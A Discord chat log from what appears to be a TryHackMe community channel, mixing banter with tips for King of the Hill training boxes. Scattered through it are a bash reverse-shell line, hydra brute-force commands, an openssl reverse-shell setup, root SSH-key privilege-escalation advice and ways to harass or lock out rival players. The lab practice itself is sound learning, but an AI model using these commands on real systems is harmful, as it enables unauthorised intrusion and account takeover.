#voice-chat

go back to kenobi

mount doesn't like me 😦

;-;

like

i did the command

mount <ip>:/var /location

it just doesn't work.

sudo apt install nfs-common

o

i didn't know that

You need NFS stuff

i still can't update or install anything with sudo tho

0% [Connecting to rs.archive.ubuntu.com (147.91.175.253)]

Apt update?

still getting stuck

should i try to upgrade?

RIP

I mean idk if you can

--fix-missing?

faulty source

no i removed the kali source as soon as i installed the gobuster

like instantly

hang on im gonna go make cigarete\

cigarette

Also, those things'll kill ya

^^

especially if you go smoke this frequently

and that early in your life

aren't you a little bit young to smoke mate?

(i started when i was 12 😂 )

that's not something you should be proud of

im not proud of it

fair nuff

wish i could stop

but yk it takes will to do it

there are many ways to stop it

you just need to set it in your mind

focus the will to finish boxes into stopping smoking

but then i won't want to finish boxes

ooo you gave me an idea

what if i multitask

nope.

i mean its worth trying

🤷‍♂️

https://media.discordapp.net/attachments/680459914828972076/717158908849946715/nootnoot.gif

https://tenor.com/view/malayalam-twitter-jk-livi-ലിവി-gif-13591191

LUL

@marble cape rn

wow my internet just broke

meth?

oh wow

math

@forest python do you want to watch me do a writeup on wonderland ?

i gotcha

@plucky vault hit it

okay lets make it 😂

https://tenor.com/view/tomato-thonk-looking-sad-thinking-gif-16673529

i'll make it tomorrow xd

i'll record the walkthrough and will do the writeup later

im tired tho

i need to finish my writeup and start the python playground one

man i need to learn making boxes

I just got RCE on python playgorund 😄

im thinking of making a stego challenge

which needs less box development

then i'll go with box dev i guess

which needs less box development
@gaunt thunder i guess i accidentally triggered Muir

Fair warning -- we aren't really accepting things like steg / encoding / crypto in their own right

what

Not as public releases

Purely because we already have lots of them

hmm

i see

As in, we usually reject challenges like that

then i guess i need to combine it with a box

like one of urs

@full sapphire if i publish my room to public how long would i have to wait till it becomes public public

keep them as a filler between normal releases

You should see the release queue @tame ether 😆

No filler required

@tame ether i really have so basic idea about box dev

We're blocked in for the next month

i'd love to (not that i'd want to do any of the boxes, blood is better)

Muri whens my box out? (i kid)

i saw john hammond's pickle box dev its just that

@plucky vault If it gets approved, at least a month just now

not really @gaunt thunder

Muri whens my box out? (i kid)
@muted sand Which one is it?

it's encoding + exploiting

wut

@muted sand Which one is it?
@full sapphire Jeff

Jeff

i didnt understand

ye

yo whats goin on XD

28th @muted sand

you mean box dev is not that hard? @tame ether

Oo ty 😛

oh wait

uhm

it's not easy for sure

@forest python help me i broke something

nwm i fixed it

should i add points to my walkthrough?

i go on phone

in bed

You don't add the points

Admins do

yo guys didnt want to cut your talking so im writing from here

its 4.07 a.m. and im out for today

take care

@forest python @marble cape @plucky vault

https://www.youtube.com/watch?v=NJ_cHxLzPWQ

nmap -sV -v -T4 <ip>

Gobuster dir -u <url> -w wordlist (optional stuff -x <.extension> -t sets the threads #100 reconmended)

maybe this is help, my own common web wordlist

tac /etc/passwd | tac

@plucky vault

tac /etc/passwd | tac
@prime summit nope. but i got it now. solved the challenge haha

cool

hey

wsl --set-default-version 2

D:

ping just went to the moon

[================== 31.4% ]

done ?

USOClient.exe ScanInstallWait

USOClient StartInstall

https://play.typeracer.com?rt=kdst03mbe

@safe plover https://www.opera.com/gx

https://www.thomasmaurer.ch/2019/06/install-wsl-2-on-windows-10/

https://pureinfotech.com/install-windows-subsystem-linux-2-windows-10/

I'm #21 in ranking 😛

In binary 👏

Yes hahaha

😎

there are 10 types of people in this world

those who understand binary and those who don't

https://tenor.com/view/kekw-seizure-shaking-lol-laugh-gif-16598372

And those who didn't expect a ternary joke

https://tenor.com/view/obama-micdrop-gif-7413222

who is tenary?

or what

jajaja

fixing the problem lol

evasion 100

oh sorry

my english is bad

git gud scrub

who is ghost pinging me

🤷

https://tenor.com/view/out-disappear-bye-gif-4932063

just like that yes lol

yeah? @plucky vault

you are supposed to solve the CTF? as you solve any other challenge

did you hear me ? \

can we ask for help on a KOTH? Or hints?

sure

the one hackers

very hard to find a way to get in

I know it has to do with probably using hydra for example against either ftp or ssh

would that be correct?

Hackers was designed to be difficult.

I see that hahaha

That's all I'll speak to :p

no probs. I'll see what else I can find 😉

hi

i have no mic

oh, it's ff1 character

sure no

it's girl from "SKAM"*

2

hi again

i have problems with thm network all the day

like ssh freezes, I have no ping, etc

!multivpn

Give that a try

Thanks, but I have bad connection on 2 different networks on 2 different pc

Is the VPN open on both of them at once?

No

strrev

Like in the morning it was laggy and now it's laggy too

echo $reversed_s = join(' ',array_reverse(explode(' ',"Hello World")));

1:19 AM

sure

hi

it's okay

no more or less - ok

and in Romania?

I am eating food

I will be gone for a bit

okay, wanna sleep

cya

good bye

cya

https://tryhackme.com/games/koth/join/866e2da0208d2417cd61552a

wfuzz

https://github.com/xmendez/wfuzz

Should I stick to Ubuntu or switch to Kali>

I'd ask in probably #room-help buddy 🙂

@tame ether how are you gonna make the cli tool?

with hands

and some programming language

https://tryhackme.com/room/linuxctf

https://tryhackme.com/room/commonlinuxprivesc

In BP Networking the answer shows wrong in task3 question number 2 convert decimal 34 to binary I put the answer correct but it says wrong answer please help me

@crisp moat #room-help

@lofty estuary

change your speaker settings

but we listen you

@lofty estuary maybe restart your discord

good idea

you guys playing koth? can i join in?

no but we can start one

naugty joiin

https://tryhackme.com/games/koth/join/860a81f77dbd24ef4e9e897b

There is mostly a flag in every user folder. user.txt and one in root.txt and you gotta find others

😄

you need to find the credentials for the ssh

every KOTH machine have ssh enabled

cve-2019-16278

cve-2019-16278
@candid maple which room?

Lion

i dont use metasploit or those exploits for koth actually

for lion i havent done much except getting a reverse shell

from uploads

there are like 3,4 ways to get into every KOTH machine. and not everyone knows all the ways in so there is always a possibility for you to find a way to get in

/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

umm i have done every machine in KOTH except carnage and offline

i can root every koth machine in like within a minute except hackers it takes like 3 minutes max

i am back

something came up

i can do a walkthrough for you if you want? @candid maple

yeah

yeah id_rsa

i havent patched anything

To use id_rsa you need to chmod 600 id_rsa

@candid maple ^

yeah

sudo chmod 600 id_rsa

ssh id_rsa ashu@10.10.121.68

ssh -i id_rsa

sudo -l

do you know what it does? ^

google it. what sudo -l does

ask in #site-support

about your vpn keep crashing

i hate carnage

havent done it yet 😄

imma try some day

https://tryhackme.com/games/koth/join/181e4c9ee7823b9092f91d01

cant show the full method do it 😄

😦

i really wanted to see

Do the king of the hill already

bruteforcing it

oh

nice

lmaoooo

@lofty moat can he/she bypass that ?

yes please

we do

@lofty moat im late to the party.

What are you doing

just playing koth

hackers

Ok

@lofty moat what are somethings that are against thm's tos

that some players do

?

what about the 9 flags

@lofty moat sorry for the pings ^^

what about the 9 flags @lofty moat

"9 flages to obtain" @lofty moat

@lofty moat Will you be streaming everyday? This is so helpful.Thank you

Please do so

kek

🙂

@lofty moat can we open ports or something? is it allowed?

https://busybox.net/downloads/binaries/

@lofty moat how about changing the active file descriptor for king.txt? 😄

I like that flag finder

My favorite way to mess wig other players: set a bunch of movie quotes as a bash array, for loop through /pts/x that’s not me, echo a quotes from the array to their /dev/pts, sleep 2 seconds.

@lofty moat editing /proc/fd of koth binary

aah never done that

the magic word being sudo?

he sets aliases for multiple commands

Ah ah ah is another favorite of mine

But I try and stay away from using that one if there are folks new to that box. Gotta make sure they have a chance to learn and have fun

WOOO Naughty is 1st!

kek

@lofty moat thanks for the tips really helpful, i wish you can stream on the daily.

😄

cya

cya

Panda is another fun one. Took me forever to get an initial foothold the first time. But after that it was quick

damn he's on fire

yep. Closing every way in.

I’ve found additional instances of chatter in weird places. This is my chattr-finder:

clear; find / -name "chatt" -type f -exec ls -ld {} ; 2>/dev/null

how do you write into the file if someone used chattr?

chattr -i file

thank you @thick cipher

what do you mean by looking for chattr?

wont which chattr will locate that?

also you can change the name for the chattr binary as well

Put a backslash before the final semi-colon to escape out. Discord removed it for some reaso

The baskslash escapes the semi-colon. No space between

can't you upload your own binaries to make sure they're fine? xD

same thing for which chattr?

I’ve had issues with which chattr. I think which only looks in your path where that one-liner looks everywhere

You can also compile your own chattr

lel

well that one liner will only look for chattr, if someone is changing the path they can also change the name for it as well

Example: Food has multiple copies hidden around

damn I wish it was the same in my room

Lol

You can put one-liners together to find / kill reverse shells....

i use killall or kill -9

wouldnt killall kill your own shell?

No.

oh.Didnt know that

If you had removed the php from the beginning then it would have worked @lofty moat

@lofty moat Change the ip

🤔

@lofty moat Try this one(you'll also need to change ip): exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");

any idea why the first connection kept closing?

any idea why the first connection kept closing?
@brave tartan that was a wrong reverse shell i think

17 minutes to start (and I'm live streaming it, because why not): https://tryhackme.com/games/koth/join/dcd31988358391daa6fa7164

too tired

imma sleep

I blame @lofty moat for making me want to stream one lol

its 1 am

ouch! get some zzz

imma go against you tomorrow 😄

lol

stream is loading for anyone?

yep

@lofty moat come join the koth?

I can't see anything on the stream rn :/

@lofty moat come join the koth?
@winged agate aah gonna sleep

@lofty moat please

toooo much tired

aah okay :)

oh

have a gn

i would love to turned off VM as well

i have to install a vm :P

im currently sshing into the kali

who gonna live stream

@thick cipher you are not going to stream ? 😢

welp gn 🙂

I am, it's just being a pain

if it's too complcated you can give up, but i would be glad

i'm learning 🙂

lol

@lofty moat

hes back

what is your shell manager ?

it's not tmux isn't it ?

yeah, it's tmux

ok i need to activate the mouse selection

it's great once you get it the way you like it

there is a robots.txt

and oh yeah a backdoor

x)

lol

you're a monster

how so? i haven't done anything but get king.....i didn't even do anything to keep it lol

how do you connect to the backdoor ?

my pc crashed :(

oki 🙂

use hydra and rockyou

thats what i was trying

my pc crashed :(
@winged agate oh that sucks! can you get it back up quickly?

ill try :)

sweet! i'm not going ham, so king is absolutely up for grabs

In top terminal is that a watch command?

okay :)

not really. it's a while true loop.

Noiceee

while true; do clear; date; echo -e "\nCurrent king: $(cat /root/king.txt)\n"; w | grep -iv $MyIP; sleep 2; done

It lets me see who's on the box without being a jerk about it

@thick cipher can you share you theme ?

your*

wtf

What do you mean by theme?

you using a theme in kali right ?

no, just regular old kali. my terminal is tmux that i put a script to together to launch and whatnot

ohh ok

thanks

mmh oki i'm going to check that

@floral trout you gotta scan again also you can use -t 64 for faster results

Your hydra has the wrong input for a failed login. try manually once with it going through burp

that'll give you the accurate "incorrect" notation so you can tell hydra

@floral trout did yfou get it working?

i get the sane thing

with hydra

have you tried to login through the browser with burp in the middle?

yep

the site it's sending creds to, and your "login failed" need fixing

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.122.134 http-post-form "/backdoor:username=^USER^&password=^PASS^:Incorrect Credentials" -V

this is my command

plague

i have the same thing

For those that requested reset, i haven't done anything to close any services or change passwords

exact same command

hydra -l plague -P /usr/share/wordlists/rockyou.txt -t 64 -I $TGT_IP http-form-post "/api/login:username=^USER^&password=^PASS^:F=Incorrect" -V

/api/login ?

That's why you kick an attempt on burp.

this line was important so

POST /api/login HTTP/1.1

yeah i was searching for the line "referer" in burp

but i didn't found it

referrer not needed

oki

oh

didnt see that

and why is t-64 quickier ?

it seems to work for me

it runs 64 threads at the same time instead of just one

oh

you did this hydra attack in less than 2min ?

yeah. it'll find the password to login to the backdoor for you

🙀

yeah i'm just so slooooow dude

and it changes everytime. so you have to re-run the hydra command every reset / game

hi @plucky vault

i'm in !

So happy !

NICE!! Congrats!!!

ty :3

don't kick me for the moment please 😄

Now work on a regular shell... the backdoor is cool and all, but shells are better

lol, i'm not kicking anyone this round....but i might mess around a tiny bit, but no super dick moves

hydra to get the password on the backdoor

Stream working?

as best i know, it is

that's weird. lemme restart the broadcast

Working now

We need a commentator in here. Everyone is so dilent xD

lol. i don't have a mic hooked up to my kali vm or i would talk at least a little bit lol

Box reset ?

@plucky vault On my screen is your hint once you're on the backdoor

Umm i think no? Did you privesc from using that gtfo sudo privesc method?

He is not talking

Not really. I did a sudo file write of my public key in to /root/.ssh/authorized_keys then just did a regular ssh

Same

Sudo privesc given in gtfo won't work

if i run those commands it isnt working

Which commands?

^

from gtfobins

sudo

It wont work

i took soooooo long to get a reverse shell wtf

but i'm in

Try the other methods. How can you use openssl

could you demonstrate? :D

You need to run some commands on your attacker box (kali, parrot, blackarch) and some on the target / victim box for that one

Well i did when i was streaming 😂

i wasant here

but if you use the file write to put your ssh public key as authorized for root........................................................

Well just read that gtfo page what else you can do?

And there goes n0beard spoiling the method 🤣😂

@lofty moat someone once told me that gcrawford's ssh key is "leaked". . . have you ever seen it anywhere but when you're already on the box?

lol

first flag !

I'm a child 😂

Yeah have seen it

how did i managed to get second 😮

i'm a noob

Well that's also always randomly generated though

I only know like 3 ways to get in

now push for a true shell and you should be able to FIND a bunch of flags

For hackers

a stabilized shell ?

you can either try to stabilize it, or find a way to login through ssh

Google how to upgrade your shrll to a fully working one

@lusty light may or may not have talked about exactly that in a presenation . .. . .. . . . that's online . . . . . .

❤️

Welcome @lusty light ! Kick ass job this weekend on that CTF!

Poor Man's Pentest is obsolete, go use pwncat https://github.com/CalebStewart/pwncat

@thick cipher Ah thank you so much! Hope it was a blast!

I didn't get a chance to play, but i got to see your videos on it

Hey @lusty light i'm in love of this community thank's to your youtube channel, so take all my love w3

❤️

@floral trout Ah thank you, that is great to hear!

@thick cipher i saw a sudo permission though openssl with sudo but can i get a shell with that

if you think outside the box a bit. figure out a way to get authorized for ssh.....perhaps as root even

@lusty light I know that you don't understand why people are watching you doing koth because you just swap between 57 shells but eh it's funny and you can learn a lot 😄

at the end, can you do a walkthrough on how you did it?

I've learned a TON watching John's wild shells

@winged agate not while the box is still live. when they put it in the warehouse i might

i hate the bruteforce part

agreed

ah okay

a lot of google and even more trial/error

have you done the THM rooms? kept notes somewhere on what you've learned?

the psw is changing though a reset ?

yes, it changes every single time

erf

Try Hack Me

Damn......i made @lusty light king, but the game doesn't recognize it because he's not in the match 😦

oh i understand better the key.perm file which has appear from nowhere now xD

like i do some nmap stuff and every single time i'm in the same place as i was before
@plucky vault nmap and gobuster are great places to start on ANY koth

Uhmm i don't wanna be rude but please no unnecessary mentions please?

Good call

That's okay. We all start from zero at some point in our lives. Start completing the THM rooms. Blue Team and Red Team Primers are a great place to start. just keep notes

this box is so easy to sabotaje

what is this bad token error message ?

do you use metasploit
@plucky vault Sometimes, but a lot of the KotH games you don't need it

I think it's just because I let the session time out

nmap is just the first step

what is this bad token error message ?
@floral trout is when somone took the next session by login in ...

ah!

you can flood with valid credentials and block everyone out

see?

lol

should i stop?

woah

should i stop?
@slim knoll probably. some folks are trying to learn

Private games, however, lol

woah
@winged agate hello fellow, greetings from Bucharest

quite late now ^^

I stopted

i was unaware

my bad

neither was i. i thought we could all have a backdoor session at the same time

but, there is a probleme anyway

@thick cipher we needed this ?
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 12345

neither was i. i thought we could all have a backdoor session at the same time
@thick cipher exactly this is the problem

I'm also from bucharest, @slim knoll :D

That's one way. It'll get you a reverse shell. But there are other ways to get a regular shell if you use your imagination

oki 🙂

it was a nice game guys

Thank's it was funny

gg :)

Good game!

not very close but still funny ^^

we are all learning

I'm also from bucharest, @slim knoll :D
@winged agate i know Andrei :))

Having fun and learning, that's what it's all about

should we pick another box?

sure

Unfortunately I have to adult for a while, but that was fun!

Do Carnage

why not carnage?

btw, i do not have premium

picking one randomly?

I can make one for you guys if no one got premium?

It's free to play no ?

everyone can create a public game and share the url

https://tryhackme.com/games/koth/join/d34521cdee1c289d7166e2b0

But in private game you can select which game you wanna play

If you're subscribed

should we pick one box?

some of you wants to talk while hacking ?

i'm not very good in english but it's a good practise

Can i join Koth ?

@slim knoll

Public KotH starts in 24 minutes; might live stream if there's interest: https://tryhackme.com/games/koth/join/e0aa448d317b7dc4dce3ebd8

KotH starts in 8 minutes: https://tryhackme.com/games/koth/join/e0aa448d317b7dc4dce3ebd8

Live streaming KotH that starts in about 8 minutes: https://tryhackme.com/games/koth/join/2e0cfa7772e1e5088a40ed2c

Playing for fun: https://tryhackme.com/games/koth/join/39f4bbc788ccc424b5a0b1df

Your message might get noticed a bit quicker in #koth (:

Szy late night classes, yaaayyy

https://tenor.com/view/what-wat-wat-lady-confused-huh-gif-8314795

no teaching from me today

https://tenor.com/view/deaf-sign-language-born-this-way-gay-sign-language-gif-14109203

since we're all deaf in here let me teach u some british sign language

But why not? 😰

No we're not deaf, we're mute

Same thing

no lesson because i'm watching netflix rn

So its not

screen share

@tame ether what ya watching

haha no free entertainment for you

@cursive herald mindhunter

s2e6 rn

is it good?

If only I had Netflix

yeah, pretty good

I wouldn't ask szy to stream

Haha imagine having Netflix.

@lofty moat i can stream netflix i currently have 300 kbps up so you'll maybe get 64p quality

Only rich kids gets to have Netflix

Those kids from school who use to bully me have one

You should try to impress them with Amazon Prime instead. Git Gud.

"rich kids"

is that elf

no

ok

oh rip szy

getting roasted

smh bee

The only thing i have to impress someone is .... Actually nothing,whom am i kidding

GBR ded 😦

Where is that sound coming from?

Oh voice chat. Nvrmnd

Yeah I was wondering why my computer was talking

Szy almost 18.. noted in my Dark diary

Now tell me your security question answers.

Aah gn. Gotta wake up in 4,5 hours.

Get some sleep. Sleep = good

gn naughty

Imma brb in few mins

whats happenin here boys...

:0

hope you don't talk about me when i'm gone

https://blog.tryhackme.com/going-from-zero-to-hero/

hope you don't talk about me when i'm gone
@tame ether That's all we've been doing.

yeah yeah

hunting thieves is more important than listening to you deciding whether you want to ban me or not

he's not kidding

¯_(ツ)_/¯

hunting thieves is more important than listening to you deciding whether you want to ban me or not
@tame ether You hunt thieves?

im a 56 years old female living in alaska

we just found a ctf that straight up ripped our stuff only changing flags

most of the challenges are just old released ones with changed flags

we just found a ctf that straight up ripped our stuff only changing flags
@tame ether That is super annoying

i have a 9 inch big

Sandwich

yeah

even ripped the rule text from our discord channel without changing our fancy ctf name that was put in there lmao

Oof

That hurts

How about tomato juice?

Face reveal -- @full sapphire

No way 😆

loll

PG13 @marble cape 😁

Also @midnight fern I can still hear you...

I do not believe this has devolved into @midnight fern offering relationship advice

It absolutely has

It’s getting worse

Lol

@full sapphire you left us

I’m going to have to leave now.

https://store.steampowered.com/app/753640/Outer_Wilds/

I have PWK to do, and my music is more soothing than you lot simping 😁

https://outerworlds.obsidian.net/en

So yeah that's not confusing.

I have PWK to do, and my music is more soothing than you lot simping 😁
@full sapphire I heard you simping in there too.

Focus on the PWK's bro!

Not all the Women of THM.

Smh. When have you ever seen me interested in anyone?...

In me

You wish 😆

hhahahha ❤️

Question, on https://thispersondoesnotexist.com/

Do these people really not exist?

I can't tell if it's a good photoshop job

Those people are computer generated

or just random photos

That's incredible

It's neither -- they're literally generated when you click the button

Hence the backgrounds sometimes being, uh...

Demonic

Is it open source?

I can Google that

I think so

https://github.com/NVlabs/stylegan2

That is absolutely insane.

I know someone who can see through it

That literally looks like a typical dude I'd know

But only one

They can tell if it's not a real human?

Because I can't

at all

Mhm. Something about the forehead distance.

I have a 5 head

does that mean I don't exist?

Feelings are severely hurt now 😦

This one tho

This gives it away, a bit

I was looking at the microphone embedded in his chin

That is normal

I have that naturally.

Explains a lot

🤣

cisterian monk

@plucky vault You aussie too, mate?

Lol, yeah.

My accent?

Aodaliya!

Aodaliya ren.

I saw the time on you box and realised it wasn't mine.

@rustic mica, any ideas on what I should do next?

Man, you exhausted every avenue I would have thought to take.

hmmm.

@plucky vault have you tried find / -iname "pass*" 2> /dev/null ?

Or did you find the pass already?

I see the file in there.

Yeah man, that find command brings it up. Look harder at the results.

Hahaha, SO CLOSE

THERE HE GOES

hahaha

Nice one man

THANK YOU!!!!

Fuck

.....

F

I gotchu fam.

There we go. I'm in.

....

https://tenor.com/view/hacker-pc-meme-matrix-codes-gif-16730883

ha c k er ma n

https://www.youtube.com/watch?v=yRn8ri9tKf8

@marble cape Outside? Someone turned the gama up too high out there.

whatcha guys talkin about in general?

@marble cape That would be something I'd love to read, myself.

this it? https://www.amazon.com/Dip-Little-Book-Teaches-Stick/dp/1591841666

@marble cape https://www.freetechbooks.com/ I found this as well. Pretty good for some ebooks.

RIP aussie internet

plz b safe ameribr0s.

@gusty lichen https://discord.gg/mWadpH

https://darknetdiaries.com/episode/67/

https://www.lenovo.com/us/en/outletus/

Texas is just America's Sydney.

You got it boy @plucky vault

https://lutris.net/

https://tryhackme.com/my-machine

cat file | base64 # encode

https://gchq.github.io/CyberChef/

echo 'base64-string' | base64 -d > file.wav

Flag 33 is misleading since you need to be logged in as bob. But its first mentioned at flag 34.

clGetPlatformIDs(): CL_PLATFORM_NOT_FOUND_KHR

This may cause "CL_OUT_OF_RESOURCES" or related errors

@fringe hare what are you doing??

The last task of hackpark

Finally, i got that shit

great

Good morning everyone.

Happy weekend from Aodaliya!

Good morning? @plucky vault what time is it in your country?

9:44AM.

all good.

Microphone broke i think

my microphone broke

again

I hvae no fucking idea.

im strumped

stumped

//

spontaneous

random

no changes to settings or anything

Nice, just enabled rdp from a meterpreter session.

Just finished a box

ice

I might not be able to hear you.

Because of noise

what noise?

Vacumn

okay its gone now

Server muted?

oh

happy weekend

Yu gi oh and pokemon were my childhood.

Everyone will compain about the government; which is good, it keeps them accountable.

What's with 568.c on exploit-db? I can't even compile this crappy code.

Am I streaming?

Alright im going.

see ya guys.

@midnight fern

https://thesecatsdonotexist.com/

wtf

https://discordapp.com/channels/521382216299839518/652632935802994710/723317798557974528

@lapis furnace I will neither confirm or deny the realness of my pic

https://yyyyyyy.info/

Oi @midnight fern behave! 🤣

Totally did not fall for that months ago

👀

https://www.geeksforgeeks.org/how-to-open-url-in-new-tab-using-javascript/

i feel old

Liar @midnight fern 🤣

My name is Mary Lou Dudechacho and I'm 69 years old. I live in Mars.

You are totally going to be able to bribe him

He's broke

@plucky vault you going to deceive your boi

@plucky vault i'll mail you taquitos if you give me 0day's info you got 😎

Smh

No @tame ether

:0

D:

Can't bb

i understand :(

Promised 0day I wouldn't give out that info

You know how it be

i'll eat the taquitos myself

Can we crowdfund this?

Crowdfund what

@full sapphire smh I won't be so easily bribed

@full sapphire smh I won't be so easily bribed
@plucky vault ❤️ you

<3

https://tenor.com/view/calculating-puzzled-math-confused-confused-look-gif-14677181

https://edd.ca.gov/about_edd/coronavirus-2019/pandemic-unemployment-assistance.htm

http://puu.sh/FYmTT/7cb0e01aa2.png

https://www.reddit.com/r/reptiles/comments/hc3h5f/my_blue_tongue_skink_doesnt_listen_when_i_tell/?utm_source=share&utm_medium=web2x

https://www.cyber.gov.au/threats/advisory-2020-008-copy-paste-compromises-tactics-techniques-and-procedures-used-target-multiple-australian-networks

https://www.theguardian.com/australia-news/2020/jun/19/australia-cyber-attack-attacks-hack-state-based-actor-says-australian-prime-minister-scott-morrison

\

https://github.com/ffuf/ffuf

So what are you guys doing rn?

sitting around a campfire and spitting in the fire

I'm in bed

I may sleep it's possible

I meant for the people live in voice chat but ok .

watching sexual reproduction videos for my bio class

We were talking about ethical hacking

Got onto discussing it from one of the dumb post earlier on what is on a child's pc

.....

was that speak speak speak for me?

@visual wyvern https://www.youtube.com/watch?v=AtuAdk4MwWw
https://www.youtube.com/watch?v=g_Row8zEJZc

i see 0day's page opened in another tab 👀

turn these off if it gets annoying:

is it ok if i type my story?

https://www.youtube.com/watch?v=rnmcRTnTNC8

clGetPlatformIDs(): CL_PLATFORM_NOT_FOUND_KHR

once upon a time, it is the story from 2014 an online friend of mine got his FB account got hacked(thats what he told me) with whom i used to play some online facebook game i knew how to a lil about phishing about that time nothing special. one of my friends from academy used brag about how he knows how to hack facebook. i asked him if he could recover he just said some stuff like he goes to inspect element and do this thing and that and gets into the user account. He was saying it with such confidence i believed him. i just went home and started looking into it what he said.. then i realized he was just lying he dont know a thing about hacking. thats when i heard about kali and installed it. i used kali for like a year or two whenever i was free. i learnt how to use metasploit, a couple of other tools as well. i hacked my own windows 7 machine at that time with some trojhans and stuff. started looking into keyloggers. after that i reinstalled windows for some reason and never got a chance to reinstall it till 3 months ago. and started THM after that.

It seems a lot that people pick up hacking for a reason, then drop it for years and try to pick it up again later as an actual thing. I like solving puzzles and that's basically what hacking is. Doing proper hacking sounds like a great time. I'd definitely love to especially dig into the social engineering/lock picking part, too. At least that's what I'll Let Myself In got me thinking about. Most people don't expect a girl to walk in and actually be malicious. I'm glad it doesn't surprise anyone here that I'm a bit of a deviant, but most people don't expect it of me. "Girls don't do that" is normally the answer I get and it makes sense to me to exploit that weakness. If there's an obvious hole, you should absolutely exploit it.

I'm muted atm, I have some music on while I actually do my homework right now. I gotta get it turned in before Sunday so I want to make sure that's done so I'm not freaking out later. 🙂

Also deafened via hardware so I can put music through my ears instead of chatter.

The struggle is real :D
Translation:
He:Bro i want to learn hacking.
He: I saw you comments of facebook
Me:Yeah, What you want to learn?

@slim sage off topic but Dota > LOL

oh its @fossil estuary i checked your site its really good <3
briskets.io

thanks @lofty moat . I appreciate it

i cant talk but i hear ya 😄

Offensive pentest = OSCP path

a KOTH match really quick? if anyone wants to play ever just ping me

https://buffered.io/posts/staged-vs-stageless-handlers/

@visual wyvern are you doing Game Zone?

Sorry my dad was on my computer.

Clicking shit.

Don't say anything through the microphone coz he's here.

@merry valve okay watch

..

is it your first time doing hackers?

Yeah

What am I missing here?

This is taking too long for a KOTH box

no idea lol

i wasnt here. what was he asking about missing?

I have nothing but FTP anon

and some possible usernames

First time doing Hackers

Does anyone know if what I'm doing is the right path?

This is taking forever

want spoilers?

Sure

plague is the user for that http

Good

So I was right on that part

Why is it taking forever? This is supposed to be fast paced right?

just brute force on that, its the easier path

I am brute forcing that backdoor with plague

36k tries so far

can i dm you my command for this brute force?

and you can compare

Sure

I'll give it 5 more mins

if nothing, I'm rage quitting

this is boring

@lofty moat confirmed that I have to use Hydra, I am assuming this box had way more resources when it was a KOTH.

Ending one

to boost the other

or may be play a KOTH machine instead?

I am not into the KOTH life

@midnight fern not very PG-13 of you 😉

I played it twice, I think it's fun to watch.

play against Will 😛

He'd beat me with little effort

lol

check DM 😄

I am stuck on a bruteforce right now

idk what is wrong but xD

btw in Hackers it will always newly generate on every new game. (id_rsa,passwords)

password for ftp and ssh user is the same

all caps?

yeah

gg

i still dont know why its not showing you result for plague

try plague. you have the credentials

the http backdoor

yeah

you cant change directory from that backdoor.. its just to get reverse shell

i think ^

yeah Hackers is by James

nah never tried that

you can but i want to see that binary in action

well not that sudo one but you can read write with openssl

sooo

so just sudo openssl any you like to read/write

Binary worked

For the new box as well

Noice

If you haven't done it

the binary is good but i simply just add my ssh key in root ssh. and ssh into root. or you can write in /etc/passwd for your new user

Dont grab those. they are useless

They are always newly generated. Passwords and ssh keys

i challenge you to privesc from that 😄 😛

i havent done that yet..

its the easiest to brute force in. simple ssh brute force

no

tried twice. couldnt find the way

find / -perm -4000 2>/dev/null if thats what you looking for?

No

i just did that plague brute force nothing else after that

i know this 😛

Wonderland

used the same method

everyone close your eyes 😄

Noice

There's still one that i dont know of

James said direct root shell in one minute

There was one glitch before.. you could just access that /backdoor/shell by setting session token to nothing. and get reverse shell. but james fixed that. i think there should be something related to that with this here.

yeah

you can access /backdoor/shell by changing post to get request in burp(Thats the way i did it) and if you were to type anything in here it would say invalid session token or something like that

If you go in /backdoor and change post request to get request and then access /backdoor/shell it wont kick you out. you can type commands in there but it would say session token invalid

Yeah there is

This ^^^

Ok

in the mean time if anyone wants to play koth??

i am always up for some koth games

Remember he said "no credentials required"

i was reading that

@forest python

I need you

which room is this ?

When "Session token" was a thing

i can brute force in but is it ok if i grab that binary from your ip? @midnight fern

imma try as well to find that way

thanks

@midnight fern look closely to that binwalk output

@forest python All 6 chars

well it is from rockyou. so may be try comparing?

with no line breaks?

is that hackers i am seeing?

xD

is that hackers i am seeing?
@fast wind he's trying to find that insta root

ah I thought that was patched?

i even had this password once for Hackers:

Ah dangit, I never tried looking for it when Ninja said that its removed(I think he said that (short term mem))

ah I thought that was patched?
@fast wind not that insta root but a better way of brute forcing. if you can figure out how wordlist is made

Ah! That is something!

Haha

The wordlist is made the exact same way as in Fortune

Good luck 😁

The wordlist is made the exact same way as in Fortune
@full sapphire Copy that down copy that down!

There are tools to make custom wordlists

well if you can just make a custom wordlist from rock you of just 6,7 letters it will be faster.
i didnt saved passwords but these are the ones that i got before:
teresa , donegal,england.
I am not sure about that ihateboys one, if it was from hackers or fortune.

lemme check if i have saved passwords in firefox

Those are the passwords that i ever got, see if that help smh:
wafako 123321123 120689 blue10 melrose ihateboys

some of them look like passes for sure

coincidence prolly